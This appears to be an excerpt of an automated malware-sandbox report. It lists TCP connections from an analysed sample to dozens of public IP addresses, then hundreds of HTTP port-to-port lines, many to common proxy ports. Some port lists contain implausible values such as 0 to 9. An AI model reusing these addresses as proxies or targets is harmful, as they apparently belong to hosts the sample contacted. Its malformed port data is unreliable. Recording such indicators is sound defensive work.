                Source: global trafficTCP traffic: 51.79.87.144 ports 41230,8533,22500,41746,0,30464,1,2,3,54395,4
                Source: global trafficTCP traffic: 75.119.145.154 ports 28633,0,25084,5,7,7505,15779
                Source: global trafficTCP traffic: 67.43.227.230 ports 5097,23685,0,5,7,9
                Source: global trafficTCP traffic: 46.175.4.76 ports 39574,3,4,5,7,9
                Source: global trafficTCP traffic: 67.43.228.253 ports 4671,7379,21649,21219,26955,2193,1,2,14869,3,9,1729
                Source: global trafficTCP traffic: 132.148.20.70 ports 0,1,4,5,8,18504
                Source: global trafficTCP traffic: 164.92.237.188 ports 63373,63722,2,3,6,7,52306
                Source: global trafficTCP traffic: 107.180.101.226 ports 37150,0,1,3,5,7
                Source: global trafficTCP traffic: 62.171.169.37 ports 0,2,4,5,58402,8
                Source: global trafficTCP traffic: 92.204.136.149 ports 16691,1,16928,6,9,18629
                Source: global trafficTCP traffic: 148.72.209.174 ports 38088,62572,1,64938,2,4,6,39458,4734,12446
                Source: global trafficTCP traffic: 50.63.12.101 ports 6095,32423,2,2953,3,10647,5,9,17559
                Source: global trafficTCP traffic: 198.12.255.193 ports 9375,22785,53281,1,2,28763,6,8,6821,51612,32216
                Source: global trafficTCP traffic: 209.222.97.30 ports 19481,62543,1,15805,4,8,9
                Source: global trafficTCP traffic: 8.213.128.6 ports 1,2,3,3128,443,50001,8,8019
                Source: global trafficTCP traffic: 51.161.131.84 ports 63055,25843,58612,2,3,4,5,8,49202
                Source: global trafficTCP traffic: 157.185.157.151 ports 26589,2,5,6,8,9
                Source: global trafficTCP traffic: 117.160.250.163 ports 8080,8081,9990,2,8,80,81,82,9999,8828
                Source: global trafficTCP traffic: 51.75.126.150 ports 19693,36694,21803,64615,2,3,11802,35632,5,6,34144,4228,37847
                Source: global trafficTCP traffic: 211.222.252.187 ports 8193,8197,1,3,8,80,9
                Source: global trafficTCP traffic: 54.38.176.200 ports 26591,3,6,7,9,3679
                Source: global trafficTCP traffic: 103.87.169.167 ports 0,2,3,32650,5,6
                Source: global trafficTCP traffic: 200.0.247.243 ports 0,1,3,10834,4,8
                Source: global trafficTCP traffic: 43.163.192.3 ports 15673,1,3,5,6,7
                Source: global trafficTCP traffic: 64.227.108.25 ports 31908,0,1,3,8,9
                Source: global trafficTCP traffic: 188.164.196.31 ports 62966,53276,2,3,5,6,7
                Source: global trafficTCP traffic: 38.127.172.169 ports 54291,1,2,4,5,9
                Source: global trafficTCP traffic: 93.158.202.194 ports 0,3,5,6,50673,7
                Source: global trafficTCP traffic: 213.136.78.200 ports 28513,1,40927,2,5,9,19925
                Source: global trafficTCP traffic: 67.43.236.20 ports 15443,8313,15583,27665,19383,24193,32323,29621,24493,31295,31557,22405,23615,18203,20703,22589,22007,1,16829,2,6,31485,9,13377
                Source: global trafficTCP traffic: 67.43.236.21 ports 27665,27687,0,2,5,29059,29477,9
                Source: global trafficTCP traffic: 72.10.164.178 ports 16693,25847,20499,20553,20651,4871,17067,27107,3165,13081,30389,2369,28791,5533,22907,4183,6243,22703,6001,8601,4343,28307,27857,0,2,33125,3,10801,28147,5,23175,14665,32977
                Source: global trafficTCP traffic: 171.244.140.160 ports 42456,15084,36273,2,4,27696,5,6,9537,53749,17525,34559
                Source: global trafficTCP traffic: 162.214.121.11 ports 3549,3,4,5,2993,18809,8989,9,46760
                Source: global trafficTCP traffic: 51.158.64.130 ports 1,3,6,7,9,16379
                Source: global trafficTCP traffic: 93.190.142.57 ports 31280,1,2,3,4,31243,26541
                Source: global trafficTCP traffic: 178.79.141.38 ports 2,3,4,5,6,45263
                Source: global trafficTCP traffic: 167.86.69.142 ports 42214,36394,45364,1,2,4
                Source: global trafficTCP traffic: 162.214.170.144 ports 37592,25347,2,3,5,27510,7,9,39503,31701
                Source: global trafficTCP traffic: 162.241.79.22 ports 0,2,4,5,52048,8,35318
                Source: global trafficTCP traffic: 142.4.7.20 ports 39782,43100,2,3,7,8,9
                Source: global trafficTCP traffic: 91.134.140.160 ports 20896,48962,2572,57320,56495,27207,9141,11946,12217,16487,49687,0,32896,53012,30895,2,3,5,7,5401,8879,51513,39803,49042
                Source: global trafficTCP traffic: 152.70.244.240 ports 1,2,3,6,8,16238
                Source: global trafficTCP traffic: 104.248.151.220 ports 63997,63648,53177,3,4,6,59755,8,52106
                Source: global trafficTCP traffic: 45.81.232.17 ports 25519,30717,61553,59421,27308,9165,54393,0,1,3,53288,7,47056,48085
                Source: global trafficTCP traffic: 103.194.88.107 ports 0,2,3,32650,5,6
                Source: global trafficTCP traffic: 148.72.215.230 ports 4990,44387,3,4,7,8
                Source: global trafficTCP traffic: 8.213.128.90 ports 8002,3129,6,80,6666,11000,7777
                Source: global trafficTCP traffic: 92.205.110.118 ports 7895,3414,26570,5,7,8,9
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 58378
                Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 37592
                Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 35774
                Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 57320
                Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 58839
                Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 32896
                Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 6821
                Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 9080
                Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 25697
                Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 48962
                Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 37592
                Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 58378 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 15303
                Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 35774
                Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 6693
                Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 9091
                Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 10005
                Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 51616
                Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 8899
                Source: unknownNetwork traffic detected: HTTP traffic on port 50164 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49868
                Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 8000
                Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 9480
                Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50224 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 32213
                Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 10005 -> 50096
                Source: unknownNetwork traffic detected: HTTP traffic on port 10005 -> 50096
                Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 58839
                Source: unknownNetwork traffic detected: HTTP traffic on port 50253 -> 37339
                Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50111 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50140 -> 7302
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49996
                Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 6821
                Source: unknownNetwork traffic detected: HTTP traffic on port 50293 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 9091 -> 49980
                Source: unknownNetwork traffic detected: HTTP traffic on port 50216 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50214 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50240 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 50308 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50362 -> 5717
                Source: unknownNetwork traffic detected: HTTP traffic on port 50250 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 50336 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 52980
                Source: unknownNetwork traffic detected: HTTP traffic on port 50259 -> 9090
                Source: unknownNetwork traffic detected: HTTP traffic on port 50377 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50442 -> 49687
                Source: unknownNetwork traffic detected: HTTP traffic on port 50363 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50299 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50428 -> 10005
                Source: unknownNetwork traffic detected: HTTP traffic on port 50361 -> 8193
                Source: unknownNetwork traffic detected: HTTP traffic on port 50385 -> 26589
                Source: unknownNetwork traffic detected: HTTP traffic on port 50475 -> 8800
                Source: unknownNetwork traffic detected: HTTP traffic on port 50374 -> 15303
                Source: unknownNetwork traffic detected: HTTP traffic on port 50386 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50346 -> 25697
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50080
                Source: unknownNetwork traffic detected: HTTP traffic on port 9480 -> 50082
                Source: unknownNetwork traffic detected: HTTP traffic on port 50236 -> 7302
                Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 32896
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50293
                Source: unknownNetwork traffic detected: HTTP traffic on port 50384 -> 16379
                Source: unknownNetwork traffic detected: HTTP traffic on port 50559 -> 58630
                Source: unknownNetwork traffic detected: HTTP traffic on port 50431 -> 31280
                Source: unknownNetwork traffic detected: HTTP traffic on port 6693 -> 49979
                Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 16379
                Source: unknownNetwork traffic detected: HTTP traffic on port 50529 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50495 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50637 -> 45108
                Source: unknownNetwork traffic detected: HTTP traffic on port 50519 -> 25825
                Source: unknownNetwork traffic detected: HTTP traffic on port 50437 -> 9150
                Source: unknownNetwork traffic detected: HTTP traffic on port 50555 -> 9764
                Source: unknownNetwork traffic detected: HTTP traffic on port 50630 -> 64767
                Source: unknownNetwork traffic detected: HTTP traffic on port 50469 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50111
                Source: unknownNetwork traffic detected: HTTP traffic on port 50619 -> 31794
                Source: unknownNetwork traffic detected: HTTP traffic on port 50411 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 49547
                Source: unknownNetwork traffic detected: HTTP traffic on port 50608 -> 16691
                Source: unknownNetwork traffic detected: HTTP traffic on port 8800 -> 50475
                Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 35774
                Source: unknownNetwork traffic detected: HTTP traffic on port 10005 -> 50428
                Source: unknownNetwork traffic detected: HTTP traffic on port 10005 -> 50428
                Source: unknownNetwork traffic detected: HTTP traffic on port 50465 -> 12446
                Source: unknownNetwork traffic detected: HTTP traffic on port 50514 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50521 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50377
                Source: unknownNetwork traffic detected: HTTP traffic on port 50526 -> 53948
                Source: unknownNetwork traffic detected: HTTP traffic on port 50689 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 7302 -> 50140
                Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 9045
                Source: unknownNetwork traffic detected: HTTP traffic on port 50643 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50520 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50538 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 1981
                Source: unknownNetwork traffic detected: HTTP traffic on port 50535 -> 25843
                Source: unknownNetwork traffic detected: HTTP traffic on port 50561 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 1080 -> 50109
                Source: unknownNetwork traffic detected: HTTP traffic on port 50714 -> 58378
                Source: unknownNetwork traffic detected: HTTP traffic on port 50612 -> 10010
                Source: unknownNetwork traffic detected: HTTP traffic on port 50589 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50653 -> 20551
                Source: unknownNetwork traffic detected: HTTP traffic on port 50571 -> 5000
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50164
                Source: unknownNetwork traffic detected: HTTP traffic on port 50624 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 50588 -> 20000
                Source: unknownNetwork traffic detected: HTTP traffic on port 50712 -> 18080
                Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 82
                Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50253 -> 37339
                Source: unknownNetwork traffic detected: HTTP traffic on port 50679 -> 31243
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50363
                Source: unknownNetwork traffic detected: HTTP traffic on port 50807 -> 20816
                Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50728 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50672 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 50681 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 51616
                Source: unknownNetwork traffic detected: HTTP traffic on port 50848 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50797 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 50706 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 5443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50727 -> 8000
                Source: unknownNetwork traffic detected: HTTP traffic on port 50738 -> 9091
                Source: unknownNetwork traffic detected: HTTP traffic on port 50751 -> 5566
                Source: unknownNetwork traffic detected: HTTP traffic on port 50713 -> 6446
                Source: unknownNetwork traffic detected: HTTP traffic on port 50949 -> 61464
                Source: unknownNetwork traffic detected: HTTP traffic on port 8899 -> 49834
                Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 32213
                Source: unknownNetwork traffic detected: HTTP traffic on port 50707 -> 9537
                Source: unknownNetwork traffic detected: HTTP traffic on port 50944 -> 43100
                Source: unknownNetwork traffic detected: HTTP traffic on port 50607 -> 9002
                Source: unknownNetwork traffic detected: HTTP traffic on port 50998 -> 58507
                Source: unknownNetwork traffic detected: HTTP traffic on port 50950 -> 47585
                Source: unknownNetwork traffic detected: HTTP traffic on port 50909 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50788 -> 9002
                Source: unknownNetwork traffic detected: HTTP traffic on port 50790 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50771 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50942 -> 26589
                Source: unknownNetwork traffic detected: HTTP traffic on port 50878 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50748 -> 8000
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50469
                Source: unknownNetwork traffic detected: HTTP traffic on port 50908 -> 30277
                Source: unknownNetwork traffic detected: HTTP traffic on port 50913 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50362 -> 5717
                Source: unknownNetwork traffic detected: HTTP traffic on port 50827 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 50868 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 16379 -> 50384
                Source: unknownNetwork traffic detected: HTTP traffic on port 51012 -> 5050
                Source: unknownNetwork traffic detected: HTTP traffic on port 58378 -> 50714
                Source: unknownNetwork traffic detected: HTTP traffic on port 50863 -> 9050
                Source: unknownNetwork traffic detected: HTTP traffic on port 50965 -> 31654
                Source: unknownNetwork traffic detected: HTTP traffic on port 50882 -> 135
                Source: unknownNetwork traffic detected: HTTP traffic on port 50899 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 6821
                Source: unknownNetwork traffic detected: HTTP traffic on port 50927 -> 10006
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50386
                Source: unknownNetwork traffic detected: HTTP traffic on port 50904 -> 35760
                Source: unknownNetwork traffic detected: HTTP traffic on port 50953 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50900 -> 1081
                Source: unknownNetwork traffic detected: HTTP traffic on port 50831 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 58839
                Source: unknownNetwork traffic detected: HTTP traffic on port 50859 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50946 -> 26591
                Source: unknownNetwork traffic detected: HTTP traffic on port 50979 -> 5566
                Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 20614
                Source: unknownNetwork traffic detected: HTTP traffic on port 10010 -> 50612
                Source: unknownNetwork traffic detected: HTTP traffic on port 18080 -> 50712
                Source: unknownNetwork traffic detected: HTTP traffic on port 20551 -> 50653
                Source: unknownNetwork traffic detected: HTTP traffic on port 50910 -> 49687
                Source: unknownNetwork traffic detected: HTTP traffic on port 51161 -> 54395
                Source: unknownNetwork traffic detected: HTTP traffic on port 50972 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50932 -> 3389
                Source: unknownNetwork traffic detected: HTTP traffic on port 50989 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 50938 -> 7302
                Source: unknownNetwork traffic detected: HTTP traffic on port 51054 -> 5767
                Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 7895
                Source: unknownNetwork traffic detected: HTTP traffic on port 51002 -> 55555
                Source: unknownNetwork traffic detected: HTTP traffic on port 50559 -> 58630
                Source: unknownNetwork traffic detected: HTTP traffic on port 51061 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51196 -> 9764
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50589
                Source: unknownNetwork traffic detected: HTTP traffic on port 31243 -> 50679
                Source: unknownNetwork traffic detected: HTTP traffic on port 51031 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 51001 -> 4153
                Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50630 -> 64767
                Source: unknownNetwork traffic detected: HTTP traffic on port 50214 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51060 -> 5630
                Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 48664
                Source: unknownNetwork traffic detected: HTTP traffic on port 51108 -> 8193
                Source: unknownNetwork traffic detected: HTTP traffic on port 51140 -> 10007
                Source: unknownNetwork traffic detected: HTTP traffic on port 51229 -> 8000
                Source: unknownNetwork traffic detected: HTTP traffic on port 51007 -> 9002
                Source: unknownNetwork traffic detected: HTTP traffic on port 51266 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51107 -> 5005
                Source: unknownNetwork traffic detected: HTTP traffic on port 51071 -> 228
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50728
                Source: unknownNetwork traffic detected: HTTP traffic on port 51073 -> 128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51183 -> 6969
                Source: unknownNetwork traffic detected: HTTP traffic on port 51166 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50977 -> 10800
                Source: unknownNetwork traffic detected: HTTP traffic on port 51232 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51317 -> 2453
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50062
                Source: unknownNetwork traffic detected: HTTP traffic on port 50619 -> 31794
                Source: unknownNetwork traffic detected: HTTP traffic on port 51280 -> 49547
                Source: unknownNetwork traffic detected: HTTP traffic on port 51191 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 51194 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 51079 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 1081
                Source: unknownNetwork traffic detected: HTTP traffic on port 51245 -> 9401
                Source: unknownNetwork traffic detected: HTTP traffic on port 51195 -> 25697
                Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 50985 -> 63997
                Source: unknownNetwork traffic detected: HTTP traffic on port 50608 -> 16691
                Source: unknownNetwork traffic detected: HTTP traffic on port 50440 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 50727
                Source: unknownNetwork traffic detected: HTTP traffic on port 51247 -> 31280
                Source: unknownNetwork traffic detected: HTTP traffic on port 51215 -> 41890
                Source: unknownNetwork traffic detected: HTTP traffic on port 9091 -> 50738
                Source: unknownNetwork traffic detected: HTTP traffic on port 51251 -> 8197
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49954
                Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 6522
                Source: unknownNetwork traffic detected: HTTP traffic on port 51296 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 50788
                Source: unknownNetwork traffic detected: HTTP traffic on port 51235 -> 8000
                Source: unknownNetwork traffic detected: HTTP traffic on port 51226 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 20000 -> 50588
                Source: unknownNetwork traffic detected: HTTP traffic on port 51281 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50868
                Source: unknownNetwork traffic detected: HTTP traffic on port 51242 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 10006 -> 50927
                Source: unknownNetwork traffic detected: HTTP traffic on port 51293 -> 9123
                Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 42214
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50771
                Source: unknownNetwork traffic detected: HTTP traffic on port 51305 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50899
                Source: unknownNetwork traffic detected: HTTP traffic on port 50162 -> 1337
                Source: unknownNetwork traffic detected: HTTP traffic on port 51113 -> 81
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50953
                Source: unknownNetwork traffic detected: HTTP traffic on port 50280 -> 64353
                Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 50748
                Source: unknownNetwork traffic detected: HTTP traffic on port 51355 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50189 -> 18877
                Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 50607
                Source: unknownNetwork traffic detected: HTTP traffic on port 51276 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50268 -> 9000
                Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 1976
                Source: unknownNetwork traffic detected: HTTP traffic on port 51248 -> 9002
                Source: unknownNetwork traffic detected: HTTP traffic on port 51327 -> 28513
                Source: unknownNetwork traffic detected: HTTP traffic on port 50949 -> 61464
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51266
                Source: unknownNetwork traffic detected: HTTP traffic on port 51319 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 51377 -> 26589
                Source: unknownNetwork traffic detected: HTTP traffic on port 50219 -> 16113
                Source: unknownNetwork traffic detected: HTTP traffic on port 5566 -> 50979
                Source: unknownNetwork traffic detected: HTTP traffic on port 50950 -> 47585
                Source: unknownNetwork traffic detected: HTTP traffic on port 51309 -> 9002
                Source: unknownNetwork traffic detected: HTTP traffic on port 51338 -> 50001
                Source: unknownNetwork traffic detected: HTTP traffic on port 51369 -> 31679
                Source: unknownNetwork traffic detected: HTTP traffic on port 50944 -> 43100
                Source: unknownNetwork traffic detected: HTTP traffic on port 50998 -> 58507
                Source: unknownNetwork traffic detected: HTTP traffic on port 50465 -> 12446
                Source: unknownNetwork traffic detected: HTTP traffic on port 50526 -> 53948
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51061
                Source: unknownNetwork traffic detected: HTTP traffic on port 50253 -> 37339
                Source: unknownNetwork traffic detected: HTTP traffic on port 1080 -> 50831
                Source: unknownNetwork traffic detected: HTTP traffic on port 7302 -> 50938
                Source: unknownNetwork traffic detected: HTTP traffic on port 10007 -> 51140
                Source: unknownNetwork traffic detected: HTTP traffic on port 9401 -> 51245
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51166
                Source: unknownNetwork traffic detected: HTTP traffic on port 51336 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 51376 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 51353 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51352 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51359 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 50278 -> 42380
                Source: unknownNetwork traffic detected: HTTP traffic on port 51368 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 51403 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51412 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50350 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50329 -> 16379
                Source: unknownNetwork traffic detected: HTTP traffic on port 50424 -> 62607
                Source: unknownNetwork traffic detected: HTTP traffic on port 50343 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50249 -> 48962
                Source: unknownNetwork traffic detected: HTTP traffic on port 6446 -> 50713
                Source: unknownNetwork traffic detected: HTTP traffic on port 50372 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51371 -> 5000
                Source: unknownNetwork traffic detected: HTTP traffic on port 51379 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 51424 -> 31654
                Source: unknownNetwork traffic detected: HTTP traffic on port 51365 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51325 -> 7302
                Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 51007
                Source: unknownNetwork traffic detected: HTTP traffic on port 128 -> 51073
                Source: unknownNetwork traffic detected: HTTP traffic on port 50706 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 5767 -> 51054
                Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 50028
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51281
                Source: unknownNetwork traffic detected: HTTP traffic on port 9123 -> 51293
                Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 51305
                Source: unknownNetwork traffic detected: HTTP traffic on port 51317 -> 2453
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51242
                Source: unknownNetwork traffic detected: HTTP traffic on port 50362 -> 5717
                Source: unknownNetwork traffic detected: HTTP traffic on port 50707 -> 9537
                Source: unknownNetwork traffic detected: HTTP traffic on port 50559 -> 58630
                Source: unknownNetwork traffic detected: HTTP traffic on port 50630 -> 64767
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50529
                Source: unknownNetwork traffic detected: HTTP traffic on port 50904 -> 35760
                Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 51309
                Source: unknownNetwork traffic detected: HTTP traffic on port 51002 -> 55555
                Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 51248
                Source: unknownNetwork traffic detected: HTTP traffic on port 50619 -> 31794
                Source: unknownNetwork traffic detected: HTTP traffic on port 51444 -> 9764
                Source: unknownNetwork traffic detected: HTTP traffic on port 50391 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51060 -> 5630
                Source: unknownNetwork traffic detected: HTTP traffic on port 50314 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50446 -> 57745
                Source: unknownNetwork traffic detected: HTTP traffic on port 51452 -> 8123
                Source: unknownNetwork traffic detected: HTTP traffic on port 51436 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 51107 -> 5005
                Source: unknownNetwork traffic detected: HTTP traffic on port 50910 -> 49687
                Source: unknownNetwork traffic detected: HTTP traffic on port 51469 -> 31034
                Source: unknownNetwork traffic detected: HTTP traffic on port 50581 -> 4145
